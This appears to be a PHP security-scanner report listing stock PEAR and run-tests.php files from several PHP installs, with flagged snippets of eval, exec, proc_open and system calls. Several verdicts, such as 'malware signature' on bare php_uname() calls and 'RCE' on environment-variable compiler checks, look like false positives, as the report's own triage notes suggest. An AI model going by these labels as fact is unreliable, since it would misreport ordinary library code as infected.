//opt/php56/share/pear/PEAR.php Size: 34.63 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php56/share/pear/PEAR/Builder.php Size: 16.73 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php56/share/pear/PEAR/Dependency2.php Size: 49.25 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
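Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a). Triage note: the matched text below is only a bare call to php_uname(), and the same signature fires on the PEAR files of every PHP install listed in this report, so compare the file with the package's distribution copy (checksum or diff) before treating it as an infection. |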
php_uname()
|
|
//opt/php56/share/pear/PEAR/Downloader.php Size: 64.26 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return strtolower($a);'); array_walk($this->_installed[$key], $strtolower); } } } function discover($channel) { $this->log(1, 'Attempting to discover channel "' . $channel . '"...'); PEAR::pushErrorHandling(PEAR_ERROR_RETURN); $callback = $this->ui ? array(&$this, '_downloadCallback') : null; if (!class_exists('System')) { require_once 'System.php'; } $tmpdir = $this->config->get('temp_dir'); $tmp = System::mktemp('-d -t "' . $tmpdir . '"'); $a = $this->downloadHttp('http:/...
|
|
//opt/php56/share/pear/PEAR/DependencyDB.php Size: 23.49 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 476 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/PEAR/Registry.php Size: 73.87 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return !empty($a);'); } $package = is_array($package) ? array(strtolower($package[0]), strtolower($package[1])) : strtolower($package); $pkgs = array(); foreach ($path as $name => $attrs) { if (is_array($attrs)) { if (isset($attrs['install-as'])) { $name = $attrs['install-as']; } if (!in_array($attrs['role'], PEAR_Installer_Role::getInstallableRoles())) { continue; } if (!in_array($attrs['role'], PEAR_Installer_Role::getBaseinstallRoles())) { $attrs['baseinstalldir'] = is_a...
| Sign 963e968a Line: 813 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = frea...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php56/share/pear/PEAR/Installer.php Size: 67.79 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php56/share/pear/PEAR/Command/Registry.php Size: 45.17 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a', 'return join(" = ",$a);'), $info[$key][$i]); $info[$key][$i] = implode(', ', $info[$key][$i]); } $info[$key] = implode("\n", $info[$key]); break; } default: { $info[$key] = implode(", ", $info[$key]); break; } } } if ($key == '_lastmodified') { $hdate = date('Y-m-d', $info[$key]); unset($info[$key]); $info['Last Modified'] = $hdate; } elseif ($key == '_lastversion') { $info['Previous Installed Version'] = $info[$key] ? $info[$key] : '- None -'; unset($info[$key]); } else { ...
|
|
//opt/php56/share/pear/PEAR/PackageFile/v2.php Size: 68.33 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $my), 'package.xml 2.0 has unmatched extra maintainers "%handles%"'); } if ($yours) { array_walk($yours, create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $yours), 'package.xml 1.0 has unmatched extra maintainers "%handles%"'); } } function _differentNotes($notes) { $truncnotes = strlen($notes) < 25 ? $notes : substr($note...
|
|
//opt/php56/share/pear/PEAR/ErrorStack.php Size: 33.00 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php56/share/pear/pearcmd.php Size: 14.83 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 415 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/Archive/Tar.php Size: 82.50 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_reduced_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor,...
|
|
//opt/php56/share/pear/OS/Guess.php Size: 10.34 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php56/lib/php/php/build/run-tests.php Size: 78.10 kB Created: 2021-11-01 19:50:25 Modified: 2022-01-04 22:25:29 Warns: 7 Dangers: 4
| Description | Match |
|---|
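Exploit execution Line: 388 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. Triage note: the match below is an environment variable (getenv) concatenated into a shell call; whether that is reachable over HTTP depends on whether this script can be requested through the web server and on who controls its environment, so check both before rating the finding. |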
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 408 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 410 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (count($IN_REDIRECT['TESTS']) == 1) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_r...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $test_result...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig']; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. | | Please check if you disabled it in php.ini. | +-----------------------------------------------------------+
NO_PROC_OPEN_ERROR; exit; } if (!defined("PHP_VERSION_ID")) { list($major, $minor, $bug) = explode(".", phpversion(), 3); $bug = (int)$bug; if ($bug < 10) { $bug = "0$bug"; } define("PHP_VERSION_ID", "{$major}0{$minor}$bug"); define("PHP_MAJOR_VERSION", $major); } if (PHP_VERSION_ID < 50300) { define('__DIR__', realpath(dirname(__FILE__))); i...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig']; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec($CUR_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 259 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR.php Size: 35.32 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php73/share/pear/PEAR/Builder.php Size: 18.50 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php73/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/DependencyDB.php Size: 23.60 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/Registry.php Size: 74.03 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 814 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; unset($r[0]); $e = $w = []; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php73/share/pear/PEAR/Installer.php Size: 68.43 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php73/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php73/share/pear/pearcmd.php Size: 14.49 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 409 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/Archive/Tar.php Size: 86.26 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); if (isset($userinfo['name'])) { $v_uname = $userinfo['name']; } if (isset($groupinfo['name'])) { $v_gname = $groupinfo['name']; } } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_...
|
|
//opt/php73/share/pear/OS/Guess.php Size: 11.25 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php73/lib/php/php/build/run-tests.php Size: 85.22 kB Created: 2021-11-18 14:42:32 Modified: 2022-01-04 22:25:27 Warns: 7 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 426 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 446 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 448 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (!empty($IN_REDIRECT['TESTS'])) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_redir...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $te...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tes...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. | | Please check if you disabled it in php.ini. | +-----------------------------------------------------------+
NO_PROC_OPEN_ERROR; exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); set_time_limit(0); ini_set('pcre.backtrack_limit', PHP_INT_MAX); while(@ob_end_clean()); if (ob_get_level()) echo "...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { if ($captureStdOut) { $line = fread($pipes[1], 8192); } elseif ($captureStdErr) { $line = fread($pipes[2], 8192); } else { $line = ''; } if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } proc_close($proc); re...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec(INIT_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 283 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR.php Size: 34.64 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php71/share/pear/PEAR/Builder.php Size: 16.84 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
